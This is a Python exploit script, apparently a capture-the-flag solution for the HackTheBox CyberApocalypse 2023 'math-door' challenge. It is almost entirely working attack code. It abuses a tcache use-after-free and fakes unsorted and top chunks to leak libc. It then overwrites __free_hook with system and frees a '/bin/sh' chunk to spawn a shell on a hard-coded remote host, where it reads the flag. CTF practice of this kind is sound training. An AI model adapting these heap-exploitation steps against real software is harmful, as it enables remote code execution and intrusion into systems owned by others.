math-door - HackTheBox CyberApocalypse 2023
# flake8: noqa
#!/usr/bin/env python3
from dn3 import *

# Challenge binary plus the libc shipped with it. `ctx` is dn3's context
# object (presumably a pwntools-style context; its definition is not shown).
exe = ELF("math-door")
libc = ELF("libc.so.6")
ctx.binary = exe
ctx.terminal = "tmux new-window".split()
#ctx.log = 0
# Only affects local launches; presumably disables ASLR for process()/gdb() —
# confirm against dn3.
ctx.aslr = False
global io

# gdb script: a single breakpoint followed by 103 `continue`s, so the debugger
# only stops late in the menu interaction. Note the leading newline is kept.
breakpoints = "\nbreak *main+48\n" + "continue\n" * 103

host, port = "68.183.37.122", 30393

# Run mode from argv[1]: "-r" remote, "-ng" local without a debugger,
# anything else (or no argument) local under gdb.
mode = sys.argv[1] if len(sys.argv) > 1 else None
if mode == "-r":
    io = remote(host, port)
elif mode == "-ng":
    io = process(exe.path)
else:
    io = gdb(exe.path, gdbscript=breakpoints)
DeathNot3(io, libc=libc)
def alloc():
    """Pick menu option 1 and return the index the program reports.

    Sends "1" after the ": \\n" prompt, reads one reply line and parses its
    last whitespace-separated token, minus its trailing character, as an int.
    Presumably that is the index of the new chunk — the exact reply format is
    not visible here.
    """
    sla(": \n", 1)
    reply = rl()
    last_token = reply.split()[-1]
    return int(last_token[:-1])
def free(idx):
    """Pick menu option 2 and answer its index prompt with `idx`."""
    for prompt, answer in ((": \n", 2), (":\n", idx)):
        sla(prompt, answer)
def hax(idx, payload):
    """Pick menu option 3 for chunk `idx` and send `payload` as raw bytes.

    The first two prompts are answered line-wise; `payload` itself is sent
    without a trailing newline (sa, not sla).
    """
    for prompt, answer in ((": \n", 3), (":\n", idx)):
        sla(prompt, answer)
    sa(":\n", payload)
# 1) overwrite tcache cookie to abuse uaf
# 2) overwrite chunk header to fake unsorted chunk and get libc pointer
# 3) get pointer to __free_hook and write fake header for __free_hook
# 4) write unsorted size and craft 2 fake chunks below __free_hook to pass checks
# 5) overwrite top chunk size to pass check
# 6) finally free __free_hook chunk to cause libc pointer to be placed on __free_hook
# 7) offset to system and free to get shell
#
# Scripted menu interaction implementing the steps above through the three
# helpers (alloc/free/hax). The sequence is order-sensitive. Every index and
# size constant below is hard-coded for this particular binary and the bundled
# libc.so.6 — nothing is computed from a leak at runtime, so a different build
# of either invalidates the whole sequence.
a = alloc()
for i in range(1,36):   # 35 further allocations; their indices are not kept
    alloc()
free(8)
free(a)
hax(a,flat([0,1337]))
free(a)
b = alloc()
hax(b,p64(0xfffffffffffffff0))
c = alloc()
unsorted_sz = alloc()
free(3)
hax(unsorted_sz,flat([0,0x421]))
free(9)
free(6)
hax(6,flat([0,1337]))
free(6)
d = alloc()
hax(d,p64(0xfffffffffffffd30))
e = alloc()
tcache = alloc()
free(a)
for i in range(2):
    alloc()
hax(3,flat([0,1337]))
free(3)
free(4)
hax(tcache,p64(0xffffffffffffff80))
hax(a, p64(0x2258-0x3f0)) #0xffffffffffffff90
alloc()
sz = alloc()
hax(sz,p64(0x21))
for i in range(11,17):
    free(i)
free(10)
hax(tcache,p64(0xfffffffffffffec0))
alloc()
hax(tcache,p64(0x8))
target = alloc()
hax(10,flat([0,1337]))
free(10)
hax(tcache,p64(0x330))
top = alloc()
hax(top,flat([0xffff7ffffffffff1,0xffff7ffffffffff1]))
hax(10,flat([0,1337]))
free(10)
hax(tcache,p64(0xfffffffffffffec0))
alloc()
hax(tcache,p64(0x418))
fake = alloc()
hax(fake,flat([0,0x21]))
hax(10,flat([0,1337]))
free(10)
hax(tcache,p64(0xfffffffffffffec0))
alloc()
hax(tcache,flat([0x438,0]))
fake = alloc()   # rebinds `fake`; the earlier index is not used again
hax(fake,flat([0,0x21]))
hax(10,flat([0,1337]))
free(10)
hax(tcache,p64(0xfffffffffffffec0))
alloc()
hax(tcache,p64(0xfffffffffffffff0))
target_sz = alloc()
hax(target_sz,flat([0x0,0x0,0x400]))
free(target)
hax(target,flat([0,0xffffffffffe656b0]))
# upk presumably unpacks the 8-byte string into an int (dn3 helper, not shown).
hax(30,p64(upk("/bin/sh\x00")))
free(30)   # step 7 above: the free is what is expected to yield the shell
msleep(10)
sl("cat flag*")   # sent to the spawned shell, if the sequence succeeded
shell()   # hand the connection over to the operator